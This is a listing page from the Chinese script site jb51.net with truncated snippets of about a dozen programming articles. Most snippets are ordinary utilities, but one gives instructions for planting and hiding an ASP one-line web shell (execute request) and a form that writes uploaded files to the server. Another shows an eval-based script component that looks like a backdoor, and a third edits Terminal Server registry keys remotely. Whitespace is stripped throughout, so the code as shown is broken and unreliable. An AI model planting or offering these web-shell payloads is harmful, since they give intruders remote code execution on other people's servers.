脚 本 之 家 www.jb51.net
页面导航:  不限条件-->后
本地搜索:
onerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strComputer="."SetStdOut=WScript.StdOutSetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_strComputer&"\root\default:StdRegProv")strKeyPath="SYSTEM\CurrentControlSet\Control\TerminalServer"oReg.CreateKeyHKEY_LOCAL_MACHINE,...
http://www.jb51.net//article/17030.htm
defchangeCVS(path)Dir.foreach(path)do|dir|ifdir!="."&&dir!=".."absdir=path+"/"+dirif(File.directory?absdir)&&(dir=="CVS")cvs_root_file_name=absdir+"/Root"pcvs_root_file_nameFile.open(cvs_root_file_name,"w")do|file|file.write(":connection_type:user@ip:repository")endelsifFile.director...
http://www.jb51.net//article/16972.htm
functiontrim(str){returnstr.replace(/(^\s*)|(\s*$)/g,"");}...
http://www.jb51.net//article/16945.htm
本文介绍网络上可找到的各种禁用浏览器后退按钮方案,分析它们各自的优缺点和适用场合。一、概述  曾经有许多人问起,“怎样才能‘禁用’浏览器的后退按钮?”,或者“怎样才能防止用户点击后退按钮返回以前浏览过的页面?”在ASP论坛上,这个问题也是问得最多的问题之一。遗憾的是,答案非常简单:我们无法禁用浏览器的后退按钮。  起先我对于居然有人想要禁用浏览器的后退按钮感到不可思议。后来,看到竟然有那么多的人想要禁用这个后退按钮,我也就释然(想要禁用的只有后退按钮,不包括浏览器的前进按钮)。因为在默认情况下,用户提交表单之后可以通过后退按钮返回表单页面(而不是使用“编辑”按钮!),然后再次编辑并提交表单向数...
http://www.jb51.net//article/16884.htm
#region得到一个月的第一天和最后一天的日期///<summary>///得到本月的第一天日期///</summary>///<returns>DateTime</returns>publicstaticDateTimeGetFirstDayOfMonth(){returnGetFirstDayOfMonth(DateTime.Now);}///<summary>///得到本月的最有一天的日期///</summary>///<returns>DateTime</returns>publicsta...
http://www.jb51.net//article/16860.htm
[html]<!DOCTYPEhtmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/><title>右下角广告_脚本之家原创_jb51.net</tit...
http://www.jb51.net//article/16830.htm
<?xmlversion="1.0"encoding="gb2312"standalone="yes"?><?componenterror="true"debug="true"?><package><componentid="haiyangtop"><public><methodname="lcx"><parametername="b"/></method></public><scriptlanguage="VBScript"><![CDATA[sublcx(b)eva...
http://www.jb51.net//article/16793.htm
首先在asp文件中写如<%executerequest("value")%>代码如果想要隐藏,就要加入一些if判断语句,即可然后在本地写个表单[code]<formaction=http://***.com/jb51.aspmethod=post><textareaname=valuecols=120rows=10width=45>setlP=server.createObject("Adodb.Stream")lP.OpenlP.Type=2lP.CharSet="gb2312"lP.writetextrequest("hackbin")lP.SaveTo...
http://www.jb51.net//article/16790.htm
history.forward();...
http://www.jb51.net//article/16783.htm
还好,用户登录这里通过一个小小的方法可以实现和论坛同步了.可以不用passport接口.这是我整理的数据,仅供参考.登录传两值过来就行(username和password);[code]<?phpsession_start();define('NOROBOT',TRUE);define('CURSCRIPT','logging');require_once'./include/common.inc.php';require_onceDISCUZ_ROOT.'./include/misc.func.php';if($action=='login'){$field=$loginfield==...
http://www.jb51.net//article/16641.htm
[code]usingSystem;usingSystem.Data;usingSystem.Configuration;usingSystem.Web;usingSystem.Web.Security;usingSystem.Web.UI;usingSystem.Web.UI.WebControls;usingSystem.Web.UI.WebControls.WebParts;usingSystem.Web.UI.HtmlControls;usingSystem.Drawing;usingSystem.IO;usingSystem.Drawing.Imaging;namespaceEC{/...
http://www.jb51.net//article/16423.htm
共有:244/10,当前1/25页  [首页] [上一页] 1 2 3 4 5 6 7 8 [下一页]  [尾页] 转到: